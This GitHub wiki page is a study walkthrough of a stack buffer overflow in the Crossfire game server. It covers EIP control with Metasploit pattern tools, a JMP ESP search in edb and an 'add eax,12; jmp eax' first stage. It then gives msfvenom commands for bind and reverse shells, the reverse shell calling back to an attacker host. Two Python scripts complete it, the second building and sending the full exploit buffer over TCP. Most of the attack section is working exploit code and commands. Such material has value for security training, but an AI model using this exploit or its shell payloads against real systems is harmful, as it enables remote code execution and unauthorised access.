
Linux Buffer Overflow

lethanhtung01011980 edited this page Dec 5, 2019 · 19 revisions

Goals

  • Generic: overwrite EIP with the address of a JMP ESP instruction, so execution lands on whatever ESP points at after the return, which is the part of our buffer that follows the EIP overwrite.
  • In Crossfire: the bytes at ESP hold only a short first stage (add eax,12 ; jmp eax). EAX points at the start of the 12-byte "setup sound " string, so EAX + 12 is the beginning of the attacker-controlled buffer, and that is where the real shellcode lives.

Default bad characters (a starting set; always confirm the full set against the target, since any byte the program strips or stops on truncates the payload)

  • 0x00 (Null)
  • 0x0A (New Line '\n')
  • 0x0D (Carriage Return '\r')
  • 0x20 (ASCII Space)

Tools

  • Evan's Debugger (edb): edb --run /usr/games/crossfire/bin/crossfire
  • Click Run twice so the program actually starts (the first Run only stops at the entry point)

Crash the program with payloads

  • The trigger depends on the program. Send increasing lengths of a single character (for example "A") until the debugger shows EIP overwritten with 0x41414141; note the length that crashes it, because the pattern in the next step must be exactly that long.

Control the EIP

  • /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 4379 generates a cyclic pattern the length of the crashing input (4379 bytes here); send it in place of the A's.
  • /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 4379 -q 46367046 looks up the value the debugger shows in EIP (0x46367046) and prints the offset at which the four bytes that overwrote EIP begin.
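The two Metasploit scripts are simple enough to reproduce, and doing so shows why the lookup works. The following is an added example, not code from this wiki: it generates the same cyclic pattern as pattern_create.rb (upper, lower, digit triplets, digit cycling fastest), then finds the offset of the EIP value exactly as pattern_offset.rb -q does, reversing the four bytes first because x86 stores the return address little-endian. Run with the page's own numbers (length 4379, EIP 0x46367046) it prints 4368, which is the offset the page's command produces.

```python
import string
import struct


def cyclic_pattern(length):
    """Reproduce pattern_create.rb: triplets of upper, lower, digit with the
    digit cycling fastest (Aa0Aa1...Aa9Ab0...), truncated to `length` bytes.
    Every 4-byte window in the pattern is unique, which is what makes the
    EIP lookup unambiguous."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("length %d exceeds the maximum pattern size %d" % (length, len(out)))


def find_offset(pattern, eip):
    """Reproduce pattern_offset.rb -q. `eip` is the value read from the
    debugger, as an int (0x46367046) or the hex string typed on the command
    line ("46367046"). x86 is little-endian, so the four bytes that overwrote
    the saved return address appear reversed in the pattern; try that first,
    then the raw byte order in case the value was copied from a byte dump.
    Returns None when the value is not part of the pattern, i.e. the crash is
    not a clean EIP overwrite."""
    if isinstance(eip, str):
        eip = int(eip, 16)
    for fmt in ("<I", ">I"):
        idx = pattern.find(struct.pack(fmt, eip))
        if idx != -1:
            return idx
    return None


if __name__ == "__main__":
    pat = cyclic_pattern(4379)
    print("EIP offset:", find_offset(pat, "46367046"))
```

If find_offset returns None, the value in EIP did not come from the pattern: either the pattern was truncated by a bad character before reaching the return address, or the crash is not a straightforward stack overflow.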

Finding JMP ESP

  • Run the crashing payload so the program is loaded in the debugger.
  • EDB > Plugins > OpcodeSearcher > Opcode Search, select "ESP -> EIP" and search the crossfire binary's own region for a usable JMP ESP address. Check that the address contains no bad characters before using it.

Need to jump 12 bytes into EAX (Crossfire application)

EAX points at the start of the 12-byte "setup sound " string, so the first stage must skip it and continue at EAX + 12. Assemble the two instructions with nasm_shell:

  • /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
  • nasm > add eax,12
  • 00000000 83C00C add eax,byte +0xc
  • nasm > jmp eax
  • 00000000 FFE0 jmp eax

Hence the payload needs \x83\xc0\x0c\xff\xe0 right after the EIP overwrite (that is where ESP points) to jump 12 bytes into the buffer at EAX.

  • Update the script so the four bytes at the EIP offset are the JMP ESP address in little-endian byte order, followed by the first stage.

Tracing if data in ESP is reached.

  • Before running crossfire, put a breakpoint on the JMP ESP address.

  • When the breakpoint hits, EIP is 0x08134596 as expected, and the instruction there is JMP ESP.

  • Press F8 (Step over) to execute the JMP ESP. Execution continues at ESP, which holds the first stage: add eax,12 (0xc is 12 in decimal) followed by jmp eax.

  • Step over again: after add eax,12, EAX points at the AAAA... filler, with the 12-byte "setup sound " prefix skipped as expected. The following jmp eax executes the buffer, so that is where the shellcode goes.

To get a shell payload for an x86 Linux target that avoids the bad characters (both commands print the result as a Python byte string, ready to paste into the script):

  • Bind shell: msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f python -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
  • Reverse shell: msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacker IP> LPORT=4444 -f python -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai (a reverse shell needs LHOST, the address it connects back to)

The encoded payload must fit in the space between EAX + 12 and the EIP overwrite; msfvenom prints its final size, so check it against the EIP offset before sending.
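Putting the steps above together, here is the buffer layout as one script. This is an added example and not the wiki author's script. Values taken from the page: the bad characters, the JMP ESP address 0x08134596, the first stage \x83\xc0\x0c\xff\xe0 and the 12-byte "setup sound " prefix; the EIP offset 4368 is what pattern_offset.rb returns for -q 46367046 on the 4379-byte pattern. The framing bytes PREFIX and SUFFIX around the command and the host/port arguments are assumptions (taken from the usual Crossfire exploit layout) and should match your own crash script. The placeholder shellcode is a constructed row of int3 instructions so the debugger stops when the chain works; replace it with the msfvenom output.

```python
import socket
import struct
import sys

# Values the page establishes for Crossfire.
BADCHARS = b"\x00\x0a\x0d\x20"          # 0x00, \n, \r, space
EIP_OFFSET = 4368                        # pattern_offset.rb -l 4379 -q 46367046
JMP_ESP = 0x08134596                     # JMP ESP inside the crossfire image (OpcodeSearcher)
FIRST_STAGE = b"\x83\xc0\x0c\xff\xe0"    # add eax,12 ; jmp eax (from nasm_shell.rb)
SOUND_CMD = b"setup sound "              # 12 bytes EAX points at; add eax,12 skips them

# ASSUMED, not on the page: the framing the classic Crossfire exploit puts around
# the command. Take these from your own crash script if they differ.
PREFIX = b"\x11("
SUFFIX = b"\x90\x00#"


def find_badchars(data, badchars=BADCHARS):
    """Return (offset, byte) for every bad character in data, so a payload is
    checked before it is sent rather than debugged after a silent truncation."""
    return [(i, b) for i, b in enumerate(data) if b in badchars]


def build_exploit(shellcode, nop_sled=16):
    """Lay out the buffer the way the page traces it:
    PREFIX | "setup sound " | NOP sled + shellcode | filler up to EIP | JMP ESP | first stage | SUFFIX
    ret -> JMP ESP -> first stage at ESP -> add eax,12 ; jmp eax -> NOP sled -> shellcode."""
    bad = find_badchars(shellcode)
    if bad:
        raise ValueError("shellcode contains bad characters at %r" % bad)
    stage2 = b"\x90" * nop_sled + shellcode       # lands at EAX + 12
    if len(stage2) > EIP_OFFSET:
        raise ValueError("payload (%d bytes) does not fit before EIP (%d)" % (len(stage2), EIP_OFFSET))
    filler = b"A" * (EIP_OFFSET - len(stage2))
    eip = struct.pack("<I", JMP_ESP)              # little-endian: \x96\x45\x13\x08
    at_esp = FIRST_STAGE + b"\x90\x90"            # what ESP points at after the ret
    buf = PREFIX + SOUND_CMD + stage2 + filler + eip + at_esp + SUFFIX
    # Sanity check: the JMP ESP address sits exactly at the EIP offset of the data.
    start = len(PREFIX) + len(SOUND_CMD) + EIP_OFFSET
    if buf[start:start + 4] != eip:
        raise RuntimeError("layout error: EIP overwrite is not at offset %d" % EIP_OFFSET)
    return buf


def send_exploit(host, port, payload):
    """Deliver the buffer over TCP; host and port are whatever the crash script used."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(payload)


if __name__ == "__main__":
    # Constructed placeholder: int3 x8 so the debugger breaks when the chain works.
    # Replace with the "buf" variable printed by msfvenom -f python.
    shellcode = b"\xcc" * 8
    payload = build_exploit(shellcode)
    if len(sys.argv) == 3:
        send_exploit(sys.argv[1], int(sys.argv[2]), payload)
    else:
        print("built %d bytes; usage: %s <host> <port>" % (len(payload), sys.argv[0]))
```

The NOP sled in front of the shellcode is optional but cheap insurance: if EAX + 12 lands a few bytes off from where you traced it, execution still slides into the decoder instead of the middle of it.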

